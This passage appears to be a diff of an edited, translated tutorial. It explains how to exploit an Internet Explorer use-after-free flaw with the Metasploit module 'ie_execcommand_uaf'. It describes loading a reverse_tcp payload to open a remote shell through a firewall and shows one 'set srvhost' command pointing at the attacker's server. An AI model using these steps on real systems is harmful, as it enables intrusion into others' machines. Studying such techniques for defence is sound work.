 In the meantime, we'll see how to exploit this flaw with Metasploit Framework.

-The module to exploit this flaw is known as "ie_execcommand_uaf ".
+The module allowing this flaw to be exploited is known as “ ie_execcommand_uaf "

 Here are the commands to use in Metasploit (here: 192.168.1.2 is the hacker's server, ie you):

-Here, we load the "reverse_tcp" payload.
-This piece of shellcode will be executed on the target machine once the vulnerability is exploited.
+Here, we load the “reverse_tcp” payload.
+This piece of shellcode will be executed on the target machine once the vulnerability has been exploited.
 A reverse TCP type connection will then be initialized and will allow you to open a remote session (even through a firewall).

 msf> set srvhost 192.168.1.2